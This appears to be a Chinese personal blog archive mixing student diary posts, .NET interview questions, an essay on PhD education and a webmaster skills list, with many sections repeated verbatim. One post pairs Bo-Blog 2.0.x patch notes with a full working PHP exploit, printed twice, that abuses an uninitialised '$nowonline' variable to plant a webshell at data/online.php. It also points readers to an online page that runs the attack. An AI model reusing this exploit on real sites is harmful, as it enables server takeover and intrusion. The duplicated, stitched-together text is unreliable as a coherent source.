由于学校网速超级的慢,But进来大家都回家了,我呢明天就回家了,所以说决定趁网速度快,等大家回到学校后只能网吧升级,嘿嘿,竟然成功了,^_^!预祝大家新年快乐。。。(好像现在网速度很令我满意)
开源的东西用的人多了,就可能有太多的人喜欢读代码,漏洞总是难免的,谢谢bob提供的升级代码,回家过年了。。。。升级后可能就会好些,也难免有新的漏洞发现,还好我的是linux系统因该大概不会有太大的漏洞,^_^。。
最新看到这个漏洞,是CNhCerKF告诉我的.这段时间忙,而且我劝他改用bo-blog结果他告诉我的最新漏洞.后来在网上和官方看了下.官方是11月22日出的补丁.下面是漏洞的信息.BO-blog是php+mysql架设的.目前网络上用的人很多.在玫瑰的博客有在线提交的页面http://www.mghacker.com/bo-blog.htm提交后,一句话马地址是:/data/online.php,直接拿到webshell.
==========================================================
官方补丁说明:http://www.bo-blog.com/bbs/topic_3604
受影响的版本:2.0.x 所有版本
危险等级:高,局部影响
触发条件:
服务器的PHP设置中,register_globals = On。register_globals = Off的情况下不受影响。
解决方法:
2.0.1 SP1用户或者2.0.2 SP2用户:请下载附件中的补丁程序,解压后上传、覆盖原先的文件。
其它版本用户:请先更新到 2.0.1 SP1用户或者2.0.2 SP2 ,然后打补丁,或者在php.ini中关闭register_globals。
===========================================================
Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码
Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$data ='nowonline[]=&1468108794=orz&-1844564458=orz';
$server =$argv[1];
$sitepath =$argv[2];
if($argc!=3){
hr();
echo" Uaget: boblog.php www.defence80.com /blog/\r\n";
echo" We Are ScriptKiz....\r\n";
hr();
ver();
exit;
}
echo "\r\nExploit For Bo-blog Last Version \r\n";
echo "Need Register Globals = On\r\n";
echo "\r\n";
preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send("",'index.php'),$php);
echo "We Got php version:\t".$php[1]."\r\n";
function send($cmd,$script)
{
global $sitepath,$server,$cookie,$count;
$path =$sitepath.$script;
$count=$count+1;
$message = "POST ".$path." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
//echo $message;
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="";
//echo $resp;
return $resp;
}
echo "Exploiting:\t\t............\r\n";
$response=send($data,'index.php');
$data='';
$response=send($data,'data/online.php');
if(strstr($response,'orz')) {
echo "We Got Webshell:\thttp://$server$path/data/online.php\r\n";
echo "For Fun :)";
}
else die("Exploit Failed!\r\n");
function ver(){
//版本信息,排列格式花了不少时间啊, - -|||
echo" +-------------------+ +-------------------+\r\n";
echo" +-www.loveshell.net-+ o'(-_-)'o +-- danger??? --+\r\n";
echo" +-------------------+ 啊?你说不怕火星人啊? +-------------------+\r\n";
hr();
}
function hr(){
echo" +-------------------------------------------------------------------+\r\n";
}
?>
最新看到这个漏洞,是CNhCerKF告诉我的.这段时间忙,而且我劝他改用bo-blog结果他告诉我的最新漏洞.后来在网上和官方看了下.官方是11月22日出的补丁.下面是漏洞的信息.BO-blog是php+mysql架设的.目前网络上用的人很多.在玫瑰的博客有在线提交的页面http://www.mghacker.com/bo-blog.htm提交后,一句话马地址是:/data/online.php,直接拿到webshell.
==========================================================
官方补丁说明:http://www.bo-blog.com/bbs/topic_3604
受影响的版本:2.0.x 所有版本
危险等级:高,局部影响
触发条件:
服务器的PHP设置中,register_globals = On。register_globals = Off的情况下不受影响。
解决方法:
2.0.1 SP1用户或者2.0.2 SP2用户:请下载附件中的补丁程序,解压后上传、覆盖原先的文件。
其它版本用户:请先更新到 2.0.1 SP1用户或者2.0.2 SP2 ,然后打补丁,或者在php.ini中关闭register_globals。
===========================================================
Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码
Bo-Blog 2.0.2 sp2 出现了 $nowonline 未初始化的漏洞,导致online.php可以注入webshell,看下漏洞攻击的代码
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$data ='nowonline[]=&1468108794=orz&-1844564458=orz';
$server =$argv[1];
$sitepath =$argv[2];
if($argc!=3){
hr();
echo" Uaget: boblog.php www.defence80.com /blog/\r\n";
echo" We Are ScriptKiz....\r\n";
hr();
ver();
exit;
}
echo "\r\nExploit For Bo-blog Last Version \r\n";
echo "Need Register Globals = On\r\n";
echo "\r\n";
preg_match('/X-Powered-By: php\/(.+)\r\n/ie',send("",'index.php'),$php);
echo "We Got php version:\t".$php[1]."\r\n";
function send($cmd,$script)
{
global $sitepath,$server,$cookie,$count;
$path =$sitepath.$script;
$count=$count+1;
$message = "POST ".$path." HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Referer: http://".$server.$path."\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Content-length: ".strlen($cmd)."\r\n";
$message .= "Connection: Keep-Alive\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
$message .= $cmd."\r\n";
//echo $message;
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
while(!@feof($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="";
//echo $resp;
return $resp;
}
echo "Exploiting:\t\t............\r\n";
$response=send($data,'index.php');
$data='';
$response=send($data,'data/online.php');
if(strstr($response,'orz')) {
echo "We Got Webshell:\thttp://$server$path/data/online.php\r\n";
echo "For Fun :)";
}
else die("Exploit Failed!\r\n");
function ver(){
//版本信息,排列格式花了不少时间啊, - -|||
echo" +-------------------+ +-------------------+\r\n";
echo" +-www.loveshell.net-+ o'(-_-)'o +-- danger??? --+\r\n";
echo" +-------------------+ 啊?你说不怕火星人啊? +-------------------+\r\n";
hr();
}
function hr(){
echo" +-------------------------------------------------------------------+\r\n";
}
?>
经过了5个学期的学习,觉得好像这个考研的学习比4个学期都还多,嘿嘿。回家真好。。。
某大型软件公司.net面试题
1:a=10,b=15,在不用第三方变题的前提下,把a,b的值互换
2:已知数组int[] max={6,5,2,9,7,4,0};用快速排序算法按降序对其进行排列,并返回数组
3:请简述面向对象的多态的特性及意义!
4:session喜欢丢值且占内存,Cookis不安全,请问用什么办法代替这两种原始的方法
5:对数据的并发采用什么办法进行处理较好。
6:已知Oracle数据库有GD和ZS两个数据库,GD数据库v_s表有数据写入时,从v_s表中提取最新数据到ZS数据库的D_E表中。请问用什么办法解决这一问题?如果又碰到不能互访的问题时,又用什么办法解决?
7:已知Oracle数据库a,b 现在在a用户权限下,访问b数据库sql语句为select a.* From b a,请改正这一句Sql的写法
8:当对数据库进行海量级的数据插入时,数据库出现报错,错误原因可能有哪些,以你的经验谈谈你的解决办法
9:算法分析
AH 20060625 12 44 01 CAD001
AH 20060625 12 44 01 CAD001
AH 20060625 13 44 02 CAD001
AH 20060625 14 44 03 CAD001
说明:第二列表示日期,第三列表示温度,第四列表示水位,第五列表示流量,第6列表示水位测站编码,每一列表示一个字段
很明显第一条数据和第二条数据重复,然数据表中有主键和外键的约束,是不允许有重复的数据存在的,请构造算法将重复的数据Del掉
10:javascript算法
已知a,b,现在点鼠标a会向b游动,鼠标停,a会停下来
请实现"跑步算法"
某软件公司面试题
1. ASP.NET框架了解多少?
2. 项目中三层结构中的中间层是怎么做的,组件是用什么做的?
3. .NET能做什么?
4. 说明TCP/IP的层次,TCP的下一层叫什么?
5. TCP有哪三部分?
6. .net的后置文件继承的类有哪些?
7. 动态数组的记录集的确定
8. xml的优点与认识
9. Com,Com+,Dcom的区别
10. LIST,MAP,SET在(java和.net中)相关的类和接口
11. Com+组件的版本控制怎么做的,怎样更新组件
12.数据库里的事务是怎么做的,触发器的问题是怎么解决的
13.java与.net的各自优势
14.数据库规划有什么重要性
1:a=10,b=15,在不用第三方变题的前提下,把a,b的值互换
2:已知数组int[] max={6,5,2,9,7,4,0};用快速排序算法按降序对其进行排列,并返回数组
3:请简述面向对象的多态的特性及意义!
4:session喜欢丢值且占内存,Cookis不安全,请问用什么办法代替这两种原始的方法
5:对数据的并发采用什么办法进行处理较好。
6:已知Oracle数据库有GD和ZS两个数据库,GD数据库v_s表有数据写入时,从v_s表中提取最新数据到ZS数据库的D_E表中。请问用什么办法解决这一问题?如果又碰到不能互访的问题时,又用什么办法解决?
7:已知Oracle数据库a,b 现在在a用户权限下,访问b数据库sql语句为select a.* From b a,请改正这一句Sql的写法
8:当对数据库进行海量级的数据插入时,数据库出现报错,错误原因可能有哪些,以你的经验谈谈你的解决办法
9:算法分析
AH 20060625 12 44 01 CAD001
AH 20060625 12 44 01 CAD001
AH 20060625 13 44 02 CAD001
AH 20060625 14 44 03 CAD001
说明:第二列表示日期,第三列表示温度,第四列表示水位,第五列表示流量,第6列表示水位测站编码,每一列表示一个字段
很明显第一条数据和第二条数据重复,然数据表中有主键和外键的约束,是不允许有重复的数据存在的,请构造算法将重复的数据Del掉
10:javascript算法
已知a,b,现在点鼠标a会向b游动,鼠标停,a会停下来
请实现"跑步算法"
某软件公司面试题
1. ASP.NET框架了解多少?
2. 项目中三层结构中的中间层是怎么做的,组件是用什么做的?
3. .NET能做什么?
4. 说明TCP/IP的层次,TCP的下一层叫什么?
5. TCP有哪三部分?
6. .net的后置文件继承的类有哪些?
7. 动态数组的记录集的确定
8. xml的优点与认识
9. Com,Com+,Dcom的区别
10. LIST,MAP,SET在(java和.net中)相关的类和接口
11. Com+组件的版本控制怎么做的,怎样更新组件
12.数据库里的事务是怎么做的,触发器的问题是怎么解决的
13.java与.net的各自优势
14.数据库规划有什么重要性
叮叮咚咚,begin!!!
近来就要毕业了,有人卖生了,有人游戏人生了,有人恋爱了,有人变态了。呵呵,我现在是双线操作:
变考研究边找工作,谈到找工作就想到还没有修满学分呢,呵呵。也就是没有毕业,为何没有毕业,听俺们细细道来:
大二的时候呢,本人外面风光无限好,可惜在险峰,没有了学习的激情,原以为工作学习两不误,没想到到头来还挂了一科,学校里面的老师我大都很和睦,很好。于是我就给老师她发了个短信,回复是,我考虑考虑。那时我是大学里面第一次回家,(大一没有回),又是她的最后一门考试,加上平时又没有怎么复习,概括说来主要是为助学金的事情打击了我,我读书又到外面做事情,为的是什么,最后我都把贫困证明给老师了,但是好像不行,我觉得很郁闷。。。why?老师说因为你买了电脑,当时我抗辩说电脑是公司为了我能给她做事而让我在工资里头扣钱的。(最后,我还是直接买下电脑了,没有再干了),因为你贫困,所以不能买电脑,因为我买了,只因那东西是玩的东西,我要说的是要是不买哪有机会用电脑的知识去LG大面试呢,哪有PHP,哪有LINUX,哪有JAVA,哪有ASPNET,哪有AJAX,哪有HIBRATE+STRUCT+SPRING,哪有MYSQL,哪有SQL2000,哪有INTERBASE等的知识,有人说学校有电脑,我想说那简直就是一个笑话,学校的电脑让你去他上面安软件,哈哈,人家那上面有还原卡,你先拿下管理员权限,然后再攻破学校的还原卡和数据中心的密码,否则你就待管理学校电脑的来PK YOU。。。
光说没有用,举个例子吧,有一次玩得好的让我们去给老师装PROTELL &EDA到学校图书馆,那儿的老师(图书馆的电脑管理员),在那儿守着,我们班同学坐在电脑边上动了下下鼠标键盘,她就发起气来了,让我们离开座位,站在过道上,当时我在场,我们系的老师是一个女老师,管理图书馆电脑的也是一个母的,因为我也动了,所以我有偏见,也更有 发言权,所以,如果你真的想学电脑 ,你就自己去买一台吧,这样可以让你更多的自由空间,因为很多茫茫然的东西都不是想像中那样简明扼要,你要自己走过了才知道,这里我走过了,也希望大家能引以为见,呵呵.(这里是补的,吃钣了.)
有人说学好本专业啊,这个问题我无法回答。。。。对不起。本人学习的广信息科学与技术,目前好像招聘会上几乎没有,我没有去过招聘会,我是听同学玩得好的说的。。。所以,没有发言权。。。。谢谢◎估计可能研究生可能要好些,我们学校有几个老师是光信息的博士生,嘿嘿,可惜我没有研究的能力啊。末办法了啊。。。#
为此,打击了我幼小的心灵,过了3年了,现在眼看就是要毕业的人了,站在现在的角度,我仍然觉得我的买电脑的决定没有错,重来一次我还会买的,可能会更多一些理性,不会让你们(不是老师同学,指环境),要不哪里会有LG面试一说,于是在这样七七八八的环境下,我就挂了,很是郁闷,这几年我一直觉得很不爽,但是,这又能怪罪谁呢,我还得生活,还得学习,工作。
搞笑一下:
为何LG会让你去面试,而我没有挂科,但是还是没有机会:
to: 正因你滑有挂科,你才没有机会,呵;
为何我挂了原子物理和量子力学还是没有机会.
答:因为你挂的科目很难,而他没有挂.
为何我挂了N多门课目,还是不要我了呢?
Re:因为你挂得太多了.
那你为何认为他挂科了还要他呢?
答:因为他连那么难的科都没有挂,而简单的给挂了,说明他有什么内在的一些事,要不就说明他太有个性,我们认为他能,他就能......
太有个性了,可能有人看后,其实我要的就是这个效果,然后,你要是说,让你长见识了,我觉得你很有想法,完了◎
变考研究边找工作,谈到找工作就想到还没有修满学分呢,呵呵。也就是没有毕业,为何没有毕业,听俺们细细道来:
大二的时候呢,本人外面风光无限好,可惜在险峰,没有了学习的激情,原以为工作学习两不误,没想到到头来还挂了一科,学校里面的老师我大都很和睦,很好。于是我就给老师她发了个短信,回复是,我考虑考虑。那时我是大学里面第一次回家,(大一没有回),又是她的最后一门考试,加上平时又没有怎么复习,概括说来主要是为助学金的事情打击了我,我读书又到外面做事情,为的是什么,最后我都把贫困证明给老师了,但是好像不行,我觉得很郁闷。。。why?老师说因为你买了电脑,当时我抗辩说电脑是公司为了我能给她做事而让我在工资里头扣钱的。(最后,我还是直接买下电脑了,没有再干了),因为你贫困,所以不能买电脑,因为我买了,只因那东西是玩的东西,我要说的是要是不买哪有机会用电脑的知识去LG大面试呢,哪有PHP,哪有LINUX,哪有JAVA,哪有ASPNET,哪有AJAX,哪有HIBRATE+STRUCT+SPRING,哪有MYSQL,哪有SQL2000,哪有INTERBASE等的知识,有人说学校有电脑,我想说那简直就是一个笑话,学校的电脑让你去他上面安软件,哈哈,人家那上面有还原卡,你先拿下管理员权限,然后再攻破学校的还原卡和数据中心的密码,否则你就待管理学校电脑的来PK YOU。。。
光说没有用,举个例子吧,有一次玩得好的让我们去给老师装PROTELL &EDA到学校图书馆,那儿的老师(图书馆的电脑管理员),在那儿守着,我们班同学坐在电脑边上动了下下鼠标键盘,她就发起气来了,让我们离开座位,站在过道上,当时我在场,我们系的老师是一个女老师,管理图书馆电脑的也是一个母的,因为我也动了,所以我有偏见,也更有 发言权,所以,如果你真的想学电脑 ,你就自己去买一台吧,这样可以让你更多的自由空间,因为很多茫茫然的东西都不是想像中那样简明扼要,你要自己走过了才知道,这里我走过了,也希望大家能引以为见,呵呵.(这里是补的,吃钣了.)
有人说学好本专业啊,这个问题我无法回答。。。。对不起。本人学习的广信息科学与技术,目前好像招聘会上几乎没有,我没有去过招聘会,我是听同学玩得好的说的。。。所以,没有发言权。。。。谢谢◎估计可能研究生可能要好些,我们学校有几个老师是光信息的博士生,嘿嘿,可惜我没有研究的能力啊。末办法了啊。。。#
为此,打击了我幼小的心灵,过了3年了,现在眼看就是要毕业的人了,站在现在的角度,我仍然觉得我的买电脑的决定没有错,重来一次我还会买的,可能会更多一些理性,不会让你们(不是老师同学,指环境),要不哪里会有LG面试一说,于是在这样七七八八的环境下,我就挂了,很是郁闷,这几年我一直觉得很不爽,但是,这又能怪罪谁呢,我还得生活,还得学习,工作。
搞笑一下:
为何LG会让你去面试,而我没有挂科,但是还是没有机会:
to: 正因你滑有挂科,你才没有机会,呵;
为何我挂了原子物理和量子力学还是没有机会.
答:因为你挂的科目很难,而他没有挂.
为何我挂了N多门课目,还是不要我了呢?
Re:因为你挂得太多了.
那你为何认为他挂科了还要他呢?
答:因为他连那么难的科都没有挂,而简单的给挂了,说明他有什么内在的一些事,要不就说明他太有个性,我们认为他能,他就能......
太有个性了,可能有人看后,其实我要的就是这个效果,然后,你要是说,让你长见识了,我觉得你很有想法,完了◎
今天骑车去清华了,回来打的的啦。车存那儿了,明天考完后从骑车到西门然后坐公交回来,再把车存再西门,后天考完后就骑车回学校,这次考研不容易,好好珍
惜,谢谢关心和伤害我的人们,我会尽力发挥的,谢谢!!!
惜,谢谢关心和伤害我的人们,我会尽力发挥的,谢谢!!!
一. 前年买了品牌电脑,被人骂了个够,说还是电脑高手,干嘛还买品牌电脑。我觉得很难回答,喜欢还不行啊。。。。,几年过去了,同学又说,其实品牌电脑挺好的啊,不过我们学校招标的品牌电脑好像垃圾,还有就是东西给换了,我同学的联想的电脑觉得挺好的,主要是整体性能较高。
二.(时间紧,以后写)
三.就是今天的大学考试到此结束,哈哈哈。。。以补考来结束我的大学考试,有意思。继续考研了了。。。
二.(时间紧,以后写)
三.就是今天的大学考试到此结束,哈哈哈。。。以补考来结束我的大学考试,有意思。继续考研了了。。。
《在中国,只有“傻瓜”才读博士》是腾讯今日话题的一个组题,里面有几个十分醒目的标题,比如虚弱的中国博士群体、博士教育成了“放羊教育”、功利化学术:导师成“老板”、博士注水:读博=赌博等等。
凤凰淑女:关于这个话题,看起来好沉重!本来博士群体应该是真正的天之骄子,但现在却弄成了不但是穷人还是"受剥削受压迫者"。一方面是在校读博士的人生活清苦,思想压力和经济压力大,以后的就业压力也大,他们带着美好的心愿,过着清教徒一般的生活,本来指望着读个博士,能出点成果,也让自己的内心有所追求,但是,他们看不到希望,看不到光明,美好的希望在现实面前被打的粉碎。因为导师忙自己的事情,对他们不关心。另一方面,学术界很腐败,导师未必想让学生有所作为。再有,就是钱大气粗的在职、有钱读书者,他们挤占了老师的时间和精力,他们勾兑老师的目的是功利的,他们有钱有手段,这些人对在校读博的青年学生构成很大的压力,老师当然就天平倾斜,哪里还会有时间和精力好好地带在校读博的清贫学生?
所以,假如读博士的人没有很好的心理素质、顽强的拼搏精神、没有钉子一般的自学和钻研精神,那些混饭吃的老师拿不出课题来给你研究和指导你,你自己也放弃努力去混时间,那样情况就是,我们国家的博士人才培养制度就真的完了!
一个急功近利的时代,一些浮躁惟利是图的老师,能培养出好的博士吗?根本是不可能的。
不过我也想问问你们这些读博士的人,当你们在学校起那个心要考硕士和博士的时候,按道理你们已经看到了中国那些所谓的导师的弊病,在本科阶段就知道他们从来不会和你见上面:好的,在国外国内飞来飞去,差的在国内各地飞来飞去,一年有大半年在外面跑,怎么可能指导学生呢?这些情况怎么不引起你们的警惕、还要去考他的博士?你可以不选这样的老师啊!很多优秀人才就是看到导师不敬业,才直接考到外国去读博的,当然,考出去,不但是看到外国的教学机制,还有学费生活费全免,最重要的,是学术风气比国内好,容易出成果.。
很多人问:北大和清华的学生为什么那么多人出国了?听听这些国内读博的学生的心声吧,他们遇到了多么尴尬和苦闷的学术环境、经济压力、心理压力、就业压力,这就是大部分优秀学子出去读书的原因。
夏天,正是学生毕业照象的日子,北大门口有两个穿着理科博士服装的年轻人照相,他们比本科生老,但比本科生孱弱,他们历经沧桑缺乏营养的脸上,能够读出来他们的生活和环境,我从心里佩服他们的毅力,艰苦啊!真的不是一般的人能过的日子,他们能毕业,还是在北大毕业,那真是有值得称赞的超强毅力。
我的熟人最终选择了出国硕博连读,他说国内导师不负责任,看不到人影,天天飘来飘去,半年在国内,半年在国外,对学生无法指导。剩下的助手导师,在国内思想陈旧,对学生困难不了解,不宽容,对学生的基本品质不能掌握,常常发生误会,没有学术气氛。本科受点气呢就算了,读博还这样,那人怎么活?!
到了国外,拿人家的钱读书,还有生活费不少,日子宽余,当然要做很多事情,比如带大一同学做实验什么的。最重要的,是选导师了,导师的确有绝对的权威,因为导师手上有钱为你付出生活费和学费。但你可以自己选择认为合适的导师,这对导师来说,也是很重要的,假如没有学生选他为导师,他第二年大概就无法续聘。有个北京的同学说,他连续三年都没有成果,他的导师耐心的等待,到第四年,他还有事情回了国一趟,导师也没有取消他的学籍,一直给他保留着,第五年,他回到导师那里,如泉涌般的创造发明就出来了,结果出了许多成果。假如没有导师的理解和等待,他是无法完成这些的。后来的学生听到这个例子,当然很愿意选这个老师做自己的导师。
因此,我说中国的博士制度,现在是很混乱的,对博士生培养,导师的心被分成两半:一半需要对付在职在位钱大气粗的那部分不在围墙里的这批所谓的学生,在职混文凭的人厉害,可以给导师带来荣耀,带来经费和课题,老师忙着和他们一起,实惠多多呢!导师需要让他们及时拿到博士这块敲门砖,以便更多的在社会上捞取好处。剩下不多的一半精力才用来对付这些辛苦考进去的在校读博穷学生。一个导师每天有多少精力啊?居然能带三十多个博士?!真是不怕误人子弟啊!
谁都知道在职读博士的比学校围墙内的博士软火,可是导师可不这么看,否则导师就不会连着几个月都不见自己招进来的正规博士生了。这是弊端啊!教育的又一个弊端。我真的想问问,这教育怎么总是走向歧途?正规读书的、凭本事考进去的读博士生,导师不好好培养,却有精力有时间带着其他在职的那些所谓的学生混,那些人又得名又得利,一头工作拿钱,一头还拿个高级文凭,厉害,世界上的好事情都拿给他们弄完了,也不怕闪了腰!
中国要崛起,是要加强教育的!但加强教育,必须加强博士生培养:一.对待在校博士这一批高端人才,国家要控制导师的质量,只有业务能力和思想能力都达到标准的,才能招博士生,没有爱学生的心、没有甘当人梯、培养人才的心,这样的人不该给他带博士生的名额和机会!美国著名的大学,考核导师的条件就有一条:对学生是不是关心?这是一条硬指标,达不到的,不再聘用。当然,对每个有资格招博士的导师,学校和财团该给他核定一定的经费,在经费允许内,让他有能力发给招来的博士生全额奖学金,也就控制了招生的人数。这些博导的资格,是要有硬指标考核的。
另外,对在校博士、和在职在位读博士的学生,要分别管理,老师也要分开,否则就不能保证公平,在校穷学生就会吃亏的。成人教育是一辈子的事情,对成人的教育和对在校生的教育应该分成两部分导师,不要搅在一起。
还有,就是对待国内读博士的学生,包括硕博连读的学生,应该提高他们的待遇,给他们奖学金和生活费,特别是博士生,年龄偏大,又有了家,才300、400一个月生活费,太清贫了,不符合高端人才的鼓励机制。必须给他们适当的费用,否则,是留不住人才在国内读书的。有人说,好点的人才都跑了,我们在为外国培养人才。怎么不是呢,美国对待读博士的学生,一个月相当于人民币2000块生活费,不但养自己,养老婆都够了。所以,我们的教育要出人才,特别是高端人才,必须在奖学金方面大方点。
另外,就是要在生活上思想上多关心这些博士,他们读出来基本上都是国家的栋梁之材,应该好好培养他们的心理素质,使他们能够健康成长。
这次网络讨论,说读博士的都是傻子,还有很多负面的说法,比如说博士找不到工作、(千万别喊我博士!)找不到老婆和嫁不出去等等,我想,新的“读书无用论”说法又卷土重来了,但这次不能怪学生,形成这种社会负面看法的,是社会机制。年轻人知道什么,他们只看现实。而社会必须高屋建瓴,必须看到人才是一个国家的战略储备,从科技兴国,走创新之路等等国家方针来看,对待培养博士的教育方法都有必要改进,一直改到能够吸引和留住最优秀的人才在国内。
凤凰淑女:关于这个话题,看起来好沉重!本来博士群体应该是真正的天之骄子,但现在却弄成了不但是穷人还是"受剥削受压迫者"。一方面是在校读博士的人生活清苦,思想压力和经济压力大,以后的就业压力也大,他们带着美好的心愿,过着清教徒一般的生活,本来指望着读个博士,能出点成果,也让自己的内心有所追求,但是,他们看不到希望,看不到光明,美好的希望在现实面前被打的粉碎。因为导师忙自己的事情,对他们不关心。另一方面,学术界很腐败,导师未必想让学生有所作为。再有,就是钱大气粗的在职、有钱读书者,他们挤占了老师的时间和精力,他们勾兑老师的目的是功利的,他们有钱有手段,这些人对在校读博的青年学生构成很大的压力,老师当然就天平倾斜,哪里还会有时间和精力好好地带在校读博的清贫学生?
所以,假如读博士的人没有很好的心理素质、顽强的拼搏精神、没有钉子一般的自学和钻研精神,那些混饭吃的老师拿不出课题来给你研究和指导你,你自己也放弃努力去混时间,那样情况就是,我们国家的博士人才培养制度就真的完了!
一个急功近利的时代,一些浮躁惟利是图的老师,能培养出好的博士吗?根本是不可能的。
不过我也想问问你们这些读博士的人,当你们在学校起那个心要考硕士和博士的时候,按道理你们已经看到了中国那些所谓的导师的弊病,在本科阶段就知道他们从来不会和你见上面:好的,在国外国内飞来飞去,差的在国内各地飞来飞去,一年有大半年在外面跑,怎么可能指导学生呢?这些情况怎么不引起你们的警惕、还要去考他的博士?你可以不选这样的老师啊!很多优秀人才就是看到导师不敬业,才直接考到外国去读博的,当然,考出去,不但是看到外国的教学机制,还有学费生活费全免,最重要的,是学术风气比国内好,容易出成果.。
很多人问:北大和清华的学生为什么那么多人出国了?听听这些国内读博的学生的心声吧,他们遇到了多么尴尬和苦闷的学术环境、经济压力、心理压力、就业压力,这就是大部分优秀学子出去读书的原因。
夏天,正是学生毕业照象的日子,北大门口有两个穿着理科博士服装的年轻人照相,他们比本科生老,但比本科生孱弱,他们历经沧桑缺乏营养的脸上,能够读出来他们的生活和环境,我从心里佩服他们的毅力,艰苦啊!真的不是一般的人能过的日子,他们能毕业,还是在北大毕业,那真是有值得称赞的超强毅力。
我的熟人最终选择了出国硕博连读,他说国内导师不负责任,看不到人影,天天飘来飘去,半年在国内,半年在国外,对学生无法指导。剩下的助手导师,在国内思想陈旧,对学生困难不了解,不宽容,对学生的基本品质不能掌握,常常发生误会,没有学术气氛。本科受点气呢就算了,读博还这样,那人怎么活?!
到了国外,拿人家的钱读书,还有生活费不少,日子宽余,当然要做很多事情,比如带大一同学做实验什么的。最重要的,是选导师了,导师的确有绝对的权威,因为导师手上有钱为你付出生活费和学费。但你可以自己选择认为合适的导师,这对导师来说,也是很重要的,假如没有学生选他为导师,他第二年大概就无法续聘。有个北京的同学说,他连续三年都没有成果,他的导师耐心的等待,到第四年,他还有事情回了国一趟,导师也没有取消他的学籍,一直给他保留着,第五年,他回到导师那里,如泉涌般的创造发明就出来了,结果出了许多成果。假如没有导师的理解和等待,他是无法完成这些的。后来的学生听到这个例子,当然很愿意选这个老师做自己的导师。
因此,我说中国的博士制度,现在是很混乱的,对博士生培养,导师的心被分成两半:一半需要对付在职在位钱大气粗的那部分不在围墙里的这批所谓的学生,在职混文凭的人厉害,可以给导师带来荣耀,带来经费和课题,老师忙着和他们一起,实惠多多呢!导师需要让他们及时拿到博士这块敲门砖,以便更多的在社会上捞取好处。剩下不多的一半精力才用来对付这些辛苦考进去的在校读博穷学生。一个导师每天有多少精力啊?居然能带三十多个博士?!真是不怕误人子弟啊!
谁都知道在职读博士的比学校围墙内的博士软火,可是导师可不这么看,否则导师就不会连着几个月都不见自己招进来的正规博士生了。这是弊端啊!教育的又一个弊端。我真的想问问,这教育怎么总是走向歧途?正规读书的、凭本事考进去的读博士生,导师不好好培养,却有精力有时间带着其他在职的那些所谓的学生混,那些人又得名又得利,一头工作拿钱,一头还拿个高级文凭,厉害,世界上的好事情都拿给他们弄完了,也不怕闪了腰!
中国要崛起,是要加强教育的!但加强教育,必须加强博士生培养:一.对待在校博士这一批高端人才,国家要控制导师的质量,只有业务能力和思想能力都达到标准的,才能招博士生,没有爱学生的心、没有甘当人梯、培养人才的心,这样的人不该给他带博士生的名额和机会!美国著名的大学,考核导师的条件就有一条:对学生是不是关心?这是一条硬指标,达不到的,不再聘用。当然,对每个有资格招博士的导师,学校和财团该给他核定一定的经费,在经费允许内,让他有能力发给招来的博士生全额奖学金,也就控制了招生的人数。这些博导的资格,是要有硬指标考核的。
另外,对在校博士、和在职在位读博士的学生,要分别管理,老师也要分开,否则就不能保证公平,在校穷学生就会吃亏的。成人教育是一辈子的事情,对成人的教育和对在校生的教育应该分成两部分导师,不要搅在一起。
还有,就是对待国内读博士的学生,包括硕博连读的学生,应该提高他们的待遇,给他们奖学金和生活费,特别是博士生,年龄偏大,又有了家,才300、400一个月生活费,太清贫了,不符合高端人才的鼓励机制。必须给他们适当的费用,否则,是留不住人才在国内读书的。有人说,好点的人才都跑了,我们在为外国培养人才。怎么不是呢,美国对待读博士的学生,一个月相当于人民币2000块生活费,不但养自己,养老婆都够了。所以,我们的教育要出人才,特别是高端人才,必须在奖学金方面大方点。
另外,就是要在生活上思想上多关心这些博士,他们读出来基本上都是国家的栋梁之材,应该好好培养他们的心理素质,使他们能够健康成长。
这次网络讨论,说读博士的都是傻子,还有很多负面的说法,比如说博士找不到工作、(千万别喊我博士!)找不到老婆和嫁不出去等等,我想,新的“读书无用论”说法又卷土重来了,但这次不能怪学生,形成这种社会负面看法的,是社会机制。年轻人知道什么,他们只看现实。而社会必须高屋建瓴,必须看到人才是一个国家的战略储备,从科技兴国,走创新之路等等国家方针来看,对待培养博士的教育方法都有必要改进,一直改到能够吸引和留住最优秀的人才在国内。
有人说大学不挂科,就会很遗憾,我于是就挂一课试试的态度看看,才发现不是每个人都可以玩的起的骑马我玩不起,20号就是考研了,可是呢。。。。会不会很不好的,从来没有想过会这样,我就像是一个被情人(老师)抛弃的孤儿,郁闷。。。高兴,挺!
总觉得个人网站与其他的职业有点不同。
总结一下,一个优秀个人网站站长,应该具备的基本技能与素质:
1、至少有1个以上的顶级域名(.com、.cn……均可)。
2、至少运营一个网站一年以上。
3、至少熟悉一种web服务器(IIS、apache、……)。
4、至少熟悉一种操作系统(windows、linux、……)。
5、至少了解一些基本的网页代码和脚本(HTML,javascript,css,……),并且能修改代码。
6、至少熟悉一种以上服务器端网页语言(ASP、ASP.NET、PHP、JSP、……)。
